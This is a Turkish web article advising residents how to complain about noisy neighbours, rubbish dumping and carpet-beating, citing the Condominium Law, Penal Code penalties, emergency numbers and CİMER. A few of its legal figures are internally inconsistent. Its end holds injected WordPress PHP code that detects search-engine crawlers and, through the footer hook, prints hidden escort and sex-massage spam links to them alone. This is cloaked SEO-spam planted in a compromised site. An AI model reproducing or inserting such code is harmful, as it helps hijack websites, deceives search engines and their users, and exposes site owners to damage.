Rahatsız Eden Gürültücü Komşuyu Şikayet Etme (Apartman)

Rahatsız Eden Gürültücü Komşuyu Şikayet Etme (Apartman)

Apartmanda yaşamanın gerektirdiği bazı kurallar vardır. Bu kurallara uyum sağlamak apartmanda yaşayan herkesin görevidir. Tüm kuralları apartman hayatı olarak nitelendirebiliriz. Bazen apartman hayatının getirdiği kurallar ihmal edilebilir. En çok ihlal edilen ise, gürültüdür. Bu yazımızda rahatsız eden gürültücü komşuyu şikayet etme, nereye şikayet edilir, polise ve zabıtaya şikayet etme, belediye gürültü şikayet etme hattı, çöp atan komşu nereye şikayet edilir, komşu şikayet dilekçesi ve CİMER gürültü hattı konularını ele alacağız.

Gürültü Yapan Komşu Nereye Şikayet Edilir?

Apartmanda yaşıyorsanız, alt veya üst komşularınız kurallara uymama ve gürültü yapma konusunda ustalaşmışlar ise yapacağınız bir çok şey bulunmakta. Bunlardan birincisi her problemi çözmenin ilk adımı olan konuşmak. Komşunuzla konuşarak uyarabilirsiniz. Devam ediyorsa apartman yöneticisiyle konuşmak. Bu da işinizi görmediyse, kiracıysa ev sahibi ile iletişime geçebilirsiniz. Bu da yetmediyse kolluk kuvvetleri ve mahkemeye başvurabilirsiniz. Ya da Kat Mülkiyeti Kanunun 25. Maddesine göre hakimden katın kendinize devredilmesini isteyebilirsiniz. Apartman gürültü kurallarına da kısaca bakacak olursak;

  • Mesai günlerinde saat 13:00-15:00 arasında, akşamları saat 19:00-07:00 arasında yüksek ses çıkartmak yasaktır. Örnek verecek olursak; yüksek sesle müzik dinlemek, matkap kullanmak, elektrik süpürgesi çalıştırmak vs.
  • Müzik aletleri ve elektronik malzemelerin sesi yalnızca odada duyulacak şekilde açılmalıdır.
  • Resmi tatillerde ve resmi tatillerde gürültü yapılmamasına dikkat edilmelidir.
  • Park ve sokaklardaki gürültüler içinse akşam saat 21:00′ a kadar süre vardır. Çoğu kişi tarafından bu süre 00:00 olarak bilinmektedir fakat bu algı yanlıştır.

Gürültü sorununu aranızda konuşarak halledemediyseniz, apartman yöneticisine durumu bildirebilir ve yardım isteyebilirsiniz.

Kat Mülkiyeti Kanunu (KMK) 18. maddesine göre, “Kat malikleri, gerek bağımsız bölümlerini, gerek eklentileri ve ortak yerleri kullanırken doğruluk kaidelerine uymak, özellikle birbirini rahatsız etmemek, birbirinin haklarını çiğnememek ve yönetim planı hükümlerine uymakla, karşılıklı olarak yükümlüdürler.”

KMK, hem ev sahipleri hem de kiralık daire sakinleri için geçerlidir. Apartmanlarda belli gürültü yasakları mevcuttur. Gürültü yapan komşunuzla konuşmak işe yaramadıysa apartman yöneticisine durumu anlatabilir, yardım isteyip konuyu daha kolay şekilde çözmeyi deneyebilirsiniz.

Kat Mülkiyet Kanunu’ nu incelemek için tıklayabilirsiniz.

Rahatsız Eden Komşu Şikayet Birimleri (Polis, Zabıta, Yönetici)

Gürültücü komşuyla konuşup, apartman yöneticisi veya ev sahibiyle de bu sorunu çözemediyseniz kollu kuvvetlerine veya hukuki yollara başvurabilirsiniz. Bunun içinde;

  • Polis: 155
  • Jandarma: 156
  • Zabıta: 153 numaralarından veya mahalle bekçilerinden yardım isteyebilirsiniz. Böylece mahkemeye başvurduğunuzda elinizde bir belge de bulunacaktır.

Gürültü Yapma ve Kurallara Uymama Ceza Tutarı

1 Ocak  tarihiyle apartmanlar için gürültü cezası 1.461 TL‘ ye yükseltildi. Şikayetinize göre gürültü yapan komşuya Kabahatler Kanunu’ nun 36. maddesine göre 150 TL, Çevre Kanunu uyarınca da 1.461 TL para cezası kesilir. Ayrıca belediye şikayet hattından şikayete başvurabilirsiniz. Komşu şikayet dilekçesi yazarak adresinizin bağlı olduğu Sulh hukuk mahkemesi üzerinden dava açabilirsiniz. Detayları yazımızın devamında görüntüleyebilirsiniz.

Gürültü Desibeli Kaçtır?

Çevre Gürültüsünün Değerlendirilmesi Ve Yönetilmesi Yönetmeliği‘ ni tıklayarak görüntüleyebilirsiniz.

Belediye Şikayet Hattı

Belediye şikayet hattı ve kolluk kuvvetleri de sorunu çözmeye yaramadıysa hukuki süreçlere başvurabilirsiniz. Hukuki süreçler içinde bilmeniz gerekenler var. Bunları da ele alacak olursak;

Türk Ceza Kanunu’ na göre bir kişi diğer kişinin huzurunu kaçırıyorsa ceza alır. Kişinin ceza alması içinde;

  • Uyarılara rağmen ısrarla gürültü yapması,
  • Hukuka aykırı başka davranışlarda bulunması,
  • Israrla telefon edilmesi.

Eğer kişi bu üç maddeden herhangi birisini ısrarla yapmaya devam ederse Türk Ceza Kanunun 123. maddesine dayanarak kişiye dava açılabilir. Eğer mahkeme haklı görürse kişi 3 ay ile 1 yıl arasında hapis cezası alır. Kişi bu cezayı para cezasına dönüştürebilir. Bunun olabilmesi için de huzuru ihmal edilen kişinin şikayetçi olması yeterlidir.

Gürültü Desibeli Kaçtır ?

Aşağıdaki tablodan 2021 yılı gürültü desibeli hakkında bilgi sahibi olabilirsiniz. Gürültü desibeli için aşağıdaki tabloyu inceleyebilirsiniz. Apartmanlarda oluşacak desibel oranları;

Yatak odası: 35

Oturma odası: 60

Mutfak: 70

Banyo: 70 desibel olarak belirlenmiştir. Gürültü desibel sınırlarına uyman daire sakini ilk olarak para cezasına, tekrarında ve gece yapması durumunda ceza iki katına çıkacaktır.

Gürültü Düzeyi Desibel Oranı
Sessiz 30-50 Desibel
Çok sessiz 0-30 Desibel
Gürültülü 60-70 Desibel
Orta Seviyede Gürültülü 50-60 Desibel
Yüksek seviyede gürültülü 70-80 Desibel
Gürültü düzeyi ve desibel oran tablosu

Rahatsız Eden Gürültücü Komşuyu Şikayet Etme

Komşunuzdan rahatsız oluyorsanız, konuşmanıza rağmen herhangi bir sonuç elde edemediyseniz hakkınızı aramaya devam edebilirsiniz. Eğer kiracıysanız durumu ev sahibine bildirebilir, komşunuz da kiracıysa yine ev sahibine bildirebilirsiniz. Buna ilaveten bir de apartman yöneticisine konuyu bildirebilir, hızlı ve kolay bir şekilde sonuca varabilirsiniz. Eğer bunlarda çözüme varmadıysa, mahalle bekçisinden, zabıta, jandarma ve polisten yardım isteyebilir, sorunu hakim karşısına taşıyabilirsiniz.

Gürültücü Komşu Şikayet Dilekçesi Örneği

Rahatsız eden gürültücü komşuyu şikayet etme yöntemlerinden biri de adrese bağlı Sulh Mahkemesine dilekçe yoluyla şikayet edebilirsiniz. Aşağıdaki dilekçe örneğini inceleyebilirsiniz.

Gürültücü Komşu İhtarname Örneği

Yukarıda yer alan ihbarnameyi inceleyerek ve indirerek komşunuz için ihbarname hazırlayabilirsiniz.

CİMER Rahatsız Eden Komşu Şikayeti Nasıl Yapılır?

Komşunuzun gürültüsünden rahatsız olduğunuz zaman yapabileceğiniz çoğu şeyi anlattık. Hukuksal çözüme başvurmadan önce, günümüzde bir çok konu hakkında yardımcı olan ve çözüm odaklı CİMER‘ e kolayca şikayette bulunabilirsiniz. CİMER resmi sitesinde ekrandan ya da e-Devlet üzerinden giriş yaparak, daha sonrada bilgilerinizi kontrol edip istenilen boş kısımları tamamladıktan sonra bir de İstek, Görüş Öneri, İhbar, Şikayet, Bilgi Edinme Hakkı kısımlarından “Şikayet” bölümünü seçerek şikayette bulunabilirsiniz.

Apartmanda hayvan beslemek istiyor fakat yasal olarak serbest mi, bu konu hakkında kanun var mı? diye öğrenmek istiyorsanız, Apartmanda Hayvan Beslemek Serbest Mi? yazımızı okuyarak bilgi sahibi olabilirsiniz.

Çöp Atan Komşu Nereye Şikayet Edilir?

Komşunuzun çöpleri gerektiği gibi atmadığını, özel alanınıza ve çevreye de zarar verdiğini fark ettiniz! Bu durumdan da şikayetçisiniz. Komşunuzla konuşmayı ve bu durumdan rahatsız olduğunuzu komşunuz ile konuşup uyarabilirsiniz. Maalesef bu durum işe yaramadı. O halde site yöneticisine durumu bildirebilir ve yardımcı olmasını talep edebilirsiniz. Yöneticinin uyarısına rağmen, kişi hala yapmaya devam ediyorsa bu süreçte de mahalle bekçilerinden, ilgili belediye zabıtalarından, jandarma ve polislerden yardım isteyebilirsiniz. Ayrıca CİMER‘ e şikayet başvurusu yapabilirsiniz. Son olarak adrese bağlı Sulh mahkemelerine şikayette bulunabilirsiniz. Böylelikle çöp atarak hem sizin özel alanınıza hem de çevreye zarar veren komşunuzla sonuca varabilir, devamlılığı sağlayabilirsiniz.

Cimer Rahatsız Eden Komşu Şikayeti
Gürültüsüz Site Hayatı, Temiz Çevre!

Halı Silkelemek Nereye Şikayet Edilir?

Sitede yaşayan komşular bazen “ne olacak bu seferlik idare edin, aramızda olabilir böyle şeyler” diyerek sizin huzurunuzu bozabilir. Bu sözler özellikle de halı çırpma davranışı sonrası ortaya çıkabiliyor. Pencereniz açıkken çırpılan halıdan gelen tüm tozlar, pislikler evin içerisine girebiliyor ya da cam kapalı olsun bu seferde önünde birikip cama yapışabiliyor. Bu görüntü gözlerinizin önüne gelmiştir. Öncelikle olayın başkahramanını uyarmanız çare olmadıysa bir de yöneticiyle konuşarak durumu çözmeye çalışmalısınız. Bu yol işe yaramadığında bu davranışın hem hukuki hem de cezai olarak iki yönü var.

Hukuki Yön:

Bu durum da yine yukarıda belirttiğimiz Kat Mülkiyeti Kanunu’ nun 18. Maddesi uyarınca yasak ve aykırı bir durumdur. Bu madde doğrultusunda avukat aracılığıyla ya da kendiniz giderek Sulh Mahkemesine başvurabilirsiniz. Böylelikle mücavirinizin halı silkmesini tedbiren yasaklatmak mümkündür.

Cezai Yön:

Savcılığa başvurarak da mücaviriniz hakkında suç duyurusunda bulunabilirsiniz. Türk Ceza Kanunu’ nun 123. Maddesine göre huzuru bozmanın cezası 3 yıldan 1 yıla kadar hapistir. Ayrıca yine TCK’ nın 151. maddesi doğrultusunda mala verme durumunda 4 aydan 3 yıla kadar hapis ve adli para cezası uygulanmaktadır.

Bir sitede yaşamak bizlere belli başlı sorumluluklar yüklüyor. Hatta apartman hayatına yönelik kurallar da kanunlar ile güvence altına alınmış durumda. Özgürlük bir başkasının özgürlüğünü ihlal etmeye başlayınca özgürlük olarak ifade edilemez. Bundan dolayı haneler arasındaki uyum ve huzuru sağlamak için tarafların inisiyatifli olması beklenilmektedir. Fakat ne yazık ki bu durum her zaman karşılıklı olmayabiliyor. Böyle durumlarda atmanız gereken ilk adım komşunuz ile bu konuyu konuşmak olacaktır. Her problemin çözümü için atılacak ilk adım konuşmaktan geçer. Fakat konuşarak halledemediğiniz durumda site yöneticisini, kiracı iseniz ev sahibinizle bu durumu konuşabilir yardımcı olmalarını isteyebilirsiniz. Bu durumda çözüme ulaşmadıysa mahkemeye başvurmadan önce kolluk kuvvetlerinden yardım isteyebilirsiniz. Hem soruna çözüm bulunabilirken hem de elinizde belgeleriniz olacaktır. Eğer bu da işe yaramadıysa mahkemeye başvurabilir, kolluk kuvvetlerine şikayetiniz olduğuna dair olan bölgeyi mahkeme sürecinde kullanabilirsiniz. Rahatsız eden gürültücü komşuyu şikayet etme yollarını artık siz de biliyorsunuz.

Evinizin altında iş yeri veya dükkan bulunuyor ve rahatsız eden ses, koku gibi durumlara maruz kalıyorsanız, yapmanız gerekenleri sizler için araştırdık. Apartman altındaki dükkan veya iş yerini şikayet etme hakkındaki yazımıza göz atabilirsiniz.

YORUMLAR

Henüz yorum yapılmamış. İlk yorumu yukarıdaki form aracılığıyla siz yapabilirsiniz.

function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = '
Süleymanpaşa escort Yenice escort Susurluk escort Yomra escort Yunusemre escort Yatağan escort Viranşehir escort Türkoğlu escort Uzunköprü escort Harran escort Sandıklı escort Dulkadiroğlu escort Söke escort Görele escort Reşadiye escort Şarkışla escort Sorgun escort Kestel escort Bilecik mutlu son Beylikdüzü mutlu son Burhaniye mutlu son Bulancak mutlu son Bozüyük mutlu son Bingöl mutlu son Beyoğlu mutlu son Canik mutlu son Çan mutlu son Bucak mutlu son Mamak mutlu son Çerkezköy mutlu son Bartın mutlu son Çorlu mutlu son Maraş mutlu son Denizli mutlu son
'; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');